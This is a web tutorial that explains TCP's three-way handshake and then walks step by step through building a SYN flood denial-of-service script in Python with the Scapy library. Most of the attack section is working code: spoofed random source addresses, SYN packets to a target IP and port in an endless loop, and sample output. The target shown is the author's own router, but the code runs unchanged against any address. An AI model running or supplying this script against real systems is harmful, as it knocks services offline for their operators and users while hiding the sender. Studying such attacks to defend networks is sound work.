TCP (Transmission Control Protocol) is the standard protocol over networks, which is used to exchange data between network conversations.
TCP uses a connection-oriented method to set up the connection between the two networks. Generally, the connection setting method of TCP is also known as “Three-Way handshake”.
In the Three Handshake method of TCP, first, the client sends the Synchronous(SYN) packets to the server as a request, then the server or receiving end accept the SYN sent by the client and as a response, it sent back the SYN with Acknowledgement (ACK). After receiving the SYN and Acknowledgement (ACK) from the server, the client sends the Acknowledgement to the server and the TCP connection established between the networks.
What is an SYN-FLOOD Attack?
In an SYN-Flood Attack, the Malicious attackers rapidly sent a lot of SYN packet to the server or receiver without acknowledging the received SYN+ACK request.
By sending rapid SYN packets can lead the server to resource starvation or failure. And these types of server attacks are very common on the Internet.
And In this tutorial, we will learn how to perform SYN flood Attacks in Python using the Python SCAPY library.
Install Required Library
For this tutorial, we will be using the Python library Scapy which is a powerful open-source packet manipulating library. Scapy is mostly used in Ethical hacking with Python, and to achieve our objective of SYN flood attack in Python, Scapy is the perfect library.
Run the following pip command to install the Python Scapy Library.
pip install scapy
Now open your favorite Python ide or text editor and start coding with us.
Let’s import the scapy library in our python script.
from scapy.all import *
For this tutorial, I will be sending Flood Attack against my own router. And for that here I will be mentioning my router IP address.
To get your Default Gateway IP address run
ip routeon your Windows command prompt or macOS/Linux terminal respectively.
#default gateway IP target_ip ="192.168.43.1" #http port target_port = 80
Now let’s define a function
synFloodAttackwhich will send the TCP Synchronous packets to the target IP address.
def synFloodAttack(target_ip, sport, dport): s_addr = RandIP() #random Ip address pkt =IP(src= s_addr, dst= target_ip)/ TCP(sport =sport, dport=dport, seq= 1505066, flags="S") send(pkt)
RandIP()will define a random IP address every time the
synFloodAttack()function is called.
The packet variable
pktconsist of the IP and the TCP method, for the Synchronous requests.
flag "S" defines that the
SYN should be on.
Now call the
synFloodAttack()function in an Infinite while loop, so it could send rapid SYN request to the target IP address.
while True: #type CTRL +C to stop the SYN pkt synFloodAttack(target_ip, 1234 , target_port )
Now put all the code together and Execute.
#Python program to Make an SYN Flooding Attack
from scapy.all import * #default gateway IP target_ip ="192.168.43.1" #http port target_port = 80 def synFloodAttack(target_ip, sport, dport): s_addr = RandIP() #random Ip address pkt =IP(src= s_addr, dst= target_ip)/ TCP(sport =sport, dport=dport, seq= 1505066, flags="S") send(pkt) while True: #type CTRL +C to stop the SYN pkt synFloodAttack(target_ip, 1234 , target_port )
Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets . Sent 1 packets
After executing the script within a few seconds you might lose your connection to the router. To stop the script Press
You can also send packets from your Command Prompt or terminal using the ping command.
ping -t "192.168.43.1"
On windows, you will see a similar output.
CTRL+Cto stop the process.
In this Python tutorial, we learned how to use the Python Scapy Libary to perform the TCP SYN Flood attack. The SYN flood attack is nothing, but only sending SYN requests rapidly without accepting or acknowledging the back response. These days many servers are immune to this type of Attack, still, it’s good to know how to perform this SYN Flood Attack in Python.
People are also reading: